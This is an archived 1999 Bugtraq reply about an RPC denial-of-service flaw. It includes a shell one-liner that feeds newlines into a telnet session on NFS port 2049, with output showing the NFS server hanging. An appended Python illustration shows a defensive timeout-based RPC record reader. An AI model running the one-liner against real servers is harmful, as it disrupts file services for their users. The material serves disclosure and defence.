Bugtraq mailing list archives
Re: KKIS.08041999.001.b - security raport - flaws in rpc part of
From: peter () ATTIC VUURWERK NL (Peter van Dijk)
Date: Thu, 15 Apr 1999 21:46:34 +0200
On Wed, Apr 14, 1999 at 03:26:14PM +0200, Lukasz Luzar wrote:
> KKI Security Team
> Cracow Commercial Internet, Poland
> http://www.security.kki.pl
> http://www.kki.pl
> mailto:security () security kki pl
> mailto:biuro () kki pl
>
> Report title : Lack of RPC's implementation in libc libraries and how it affects for example portmap.
A much easier DoS is obtained by connecting to an RPC port and just sending some random (most will do) garbage every 5 seconds. Note that this _does_ affect the UDP services in the same daemons.

I have seen this bug in _every_ RPC implementation, with a few exceptions: mcserv (which does not really use the RPC protocol, only the portmapper), Sun's own nfsd [although their portmapper is buggy], and NetApp boxes.

To wit:

[root@koek] ~# ( while true ; do echo ; sleep 5 ; done ) | telnet zopie 2049
Trying 10.10.13.1...
Connected to zopie.attic.vuurwerk.nl.
Escape character is '^]'.
NFS server zopie not responding, still trying.
Connection closed by foreign host.
[root@koek] ~# NFS server zopie OK.

Right after I started the telnet, I switched to another VC and did ls /zopie, the NFS mounted disk. The ls did not give any output until I ctrl-C'ed the telnet.

Greetz, Peter
--
| 'He broke my heart,  | Peter van Dijk                              |
| I broke his neck'    | peter () attic vuurwerk nl                  |
| nognixz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl        |
|                      | Hardbeat@undernet - #groningen/#kinkfm/#vdh |
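As an added illustration (not Peter's code, nor that of any RPC implementation he names), assuming a daemon that reads RPC over TCP with RFC 1831 record marking: bounding each read with an idle timeout and rejecting impossible fragment lengths lets the daemon drop a connection that only ever delivers stray newlines, instead of blocking on it while its other clients wait. `MAX_FRAGMENT` and the `simulate` harness are assumptions made for the demonstration.

```python
import socket
import struct

# Largest fragment we are willing to buffer (assumed policy value, not from the
# post): a header claiming more than this is treated as garbage, not as RPC.
MAX_FRAGMENT = 64 * 1024


def recv_exact(sock, n, idle_timeout):
    """Read exactly n bytes, waiting at most idle_timeout seconds per recv()."""
    sock.settimeout(idle_timeout)
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed before the record completed")
        buf += chunk
    return bytes(buf)


def read_rpc_record(sock, idle_timeout=2.0):
    """Read one ONC RPC record (RFC 1831 record marking: 4-byte big-endian
    header per fragment, top bit = last fragment, low 31 bits = length).
    Returns the record, or None when the peer goes idle or sends a header that
    cannot be an honest fragment, so the daemon can drop the connection."""
    record = bytearray()
    try:
        while True:
            (marker,) = struct.unpack("!I", recv_exact(sock, 4, idle_timeout))
            last, length = bool(marker & 0x80000000), marker & 0x7FFFFFFF
            if length == 0 or length > MAX_FRAGMENT:
                return None  # e.g. b"\r\n\r\n" decodes to ~219 MB: reject
            record += recv_exact(sock, length, idle_timeout)
            if last:
                return bytes(record)
    except (socket.timeout, ConnectionError):
        return None


def build_record(payload):
    """Wrap payload as a single last-fragment record (well-formed client)."""
    return struct.pack("!I", 0x80000000 | len(payload)) + payload


def simulate(client_bytes, idle_timeout=0.5):
    """Constructed harness: push client_bytes into one end of a socketpair and
    read a record from the other end, as a daemon's TCP accept loop would."""
    server, client = socket.socketpair()
    try:
        client.sendall(client_bytes)
        return read_rpc_record(server, idle_timeout)
    finally:
        server.close()
        client.close()
```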
Current thread:
- Re: KKIS.08041999.001.b - security raport - flaws in rpc part of Peter van Dijk (Apr 15)
- Re: KKIS.08041999.001.b - security raport - flaws in rpc part of Olaf Kirch (Apr 16)